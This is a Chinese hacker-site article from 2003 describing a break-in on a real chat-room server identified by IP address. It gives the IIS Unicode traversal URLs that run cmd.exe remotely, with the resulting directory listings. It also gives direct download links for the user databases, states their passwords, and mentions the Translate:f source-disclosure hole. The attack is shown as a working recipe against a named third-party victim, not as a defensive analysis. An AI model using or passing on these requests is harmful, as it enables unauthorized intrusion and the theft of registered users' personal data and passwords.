聊天室攻破手迹 - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文

用户登录

新用户注册

聊天室攻破手迹

热

【字体：小大】

聊天室攻破手迹

作者：不详文章来源：来自 Internet 点击数：更新时间：2003-12-7

本人向来不去什么聊天室觉得简直就是浪费生命的表现，但偏偏有不少人喜欢去里面捣乱（我绝对是不支持的），但既然有人感兴趣就拿个地方给大家讲讲下不为例！！！就拿不少人喜欢的江湖来讲讲吧我去的是四川自贡分部-------

地址http://61.139.44.69/xajh

首先http://61.139.44.69/xajh/.ida可以看到它的物理路径,显示为：

找不到 IDQ 文件 C:\Inetpub\wwwroot\xajh\.ida

然后http://61.139.44.69/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
可以看到它的C盘根目录为：
Directory of c:\

2000-10-12 15:58 0 -xquizit.nfo
2000-10-12 15:58 0 .zip
2000-10-12 15:59 0 001.mid
2000-10-12 15:56 0 07-艳阳天.mp3
2000-10-12 15:58 0 1-1-132684_4(1).jpg
2000-10-12 15:58 0 1.gif
2000-10-12 15:49 0 10.ram
2000-10-12 15:49 0 10.rm
2000-10-12 15:58 0 2.gif
2000-10-12 15:58 0 3.gif
2000-10-12 15:58 0 4.gif
2000-10-12 15:58 0 5.gif
2000-10-12 15:58 0 6.gif
2000-10-12 15:55 0 9901_01.htm
2000-10-12 15:50 0 9901_01.mp3
2000-10-12 15:55 0 9901_01.ram
2000-10-12 15:55 0 9901_01.rm
2000-10-12 15:55 0 9901_02.htm
2000-10-12 15:50 0 9901_02.mp3
2000-10-12 15:55 0 9901_02.ram
2000-10-12 15:55 0 9901_02.rm
2000-10-12 15:55 0 9901_03.htm
2000-10-12 15:50 0 9901_03.mp3
2000-10-12 15:55 0 9901_03.ram
2000-10-12 15:55 0 9901_03.rm
2000-10-12 15:55 0 9901_04.htm
2000-10-12 15:50 0 9901_04.mp3
2000-10-12 15:55 0 9901_04.ram
2000-10-12 15:55 0 9901_04.rm
2000-10-12 15:55 0 9901_05.htm
2000-10-12 15:50 0 9901_05.mp3
2000-10-12 15:55 0 9901_05.ram
2000-10-12 15:55 0 9901_05.rm

......实在太多了还有好多垃圾MP3 ：（

直接进去看我们要看的访问
http://61.139.44.69/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot\xajh\

显示为：

Directory of C:\Inetpub\wwwroot\xajh

2000-10-13 17:49 < DIR > .
2000-10-13 17:49 < DIR > ..
2000-10-12 16:33 < DIR > admin
2000-10-12 16:33 < DIR > bbs
2000-10-12 16:33 < DIR > chat
2000-10-12 16:33 < DIR > Commodity
2000-10-12 18:45 5,015 cuteftp.cnt
2000-10-12 18:46 130,748 cuteftp.hlp
2000-10-12 16:33 < DIR > face1
2000-10-12 16:33 < DIR > faction
2000-10-12 16:33 < DIR > flower
2000-10-12 16:33 < DIR > gamebak
2000-10-12 19:08 829 global.asa
2000-10-12 16:33 < DIR > images
2000-09-30 19:51 3,513 index.asp
2000-09-30 19:34 433 index.htm
2000-09-30 19:47 5,062 jh.asp
2000-09-19 18:58 488 login.asp
2000-08-30 21:49 1,324 Message.asp
2000-10-12 16:33 < DIR > midi
2000-09-18 21:47 1,850 modipass.htm
2000-09-06 19:07 97 music.asp
2000-09-23 11:56 82 online.asp
2000-09-22 12:29 2,133 register.htm
2000-09-25 14:07 2,107 s1.htm
2000-10-12 16:33 < DIR > serve
2000-09-01 22:22 431 style.css
2000-09-19 19:12 400 wupin.asp
2000-10-12 16:33 < DIR > yuelao
2000-10-13 17:15 1,001,472 zg11.mdb
2000-10-11 07:58 978,944 zg21.mdb
17 File(s) 2,134,928 bytes
14 Dir(s) 2,001,309,696 bytes free

看到zg11.mdb 和zg21.mdb没有那就是记录所有用户数据密码资料的数据库了！快用浏览器拿回来吧：）
http://61.139.44.69/xajh/zg11.mdb
http://61.139.44.69/xajh/zg21.mdb

现在我们已经成功一大半了，下载完毕打开的时候发现要密码呵呵~ 麻烦还得自己破下幸好是Access97的马上就看到密码了是pass1和pass2 简单吧：）
现在他们那里所有注册用户的资料数据我们就全拿到了，不过高兴别太早其中密码项还是有加密处理的，至于怎么解嘛当然不能说了大家可以自己试试总之非常简单就是了。还有他们的服务器2000NT有translate:f的漏洞可以轻松看到所有ASP原文件，省了你不少时间吧。

上面就是对一台2000NT服务器上的聊天室的简单破解，实际上是通过远程调用CMD进程来实现的，当然方法还有很多大家可以随便看看，如果你对这篇文章有什么不理解的地方或让我帮你破什么BBS 聊天室千万不要找我毕竟本人还是主张不要聊天浪费生命的。

责任编辑：Firewall　　联系方式　Email：Firewall

电话：51228163

上一篇黑客：聊天室的攻防技巧

下一篇黑客：你知道吗?DNS的默认设置帮助黑客入侵

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913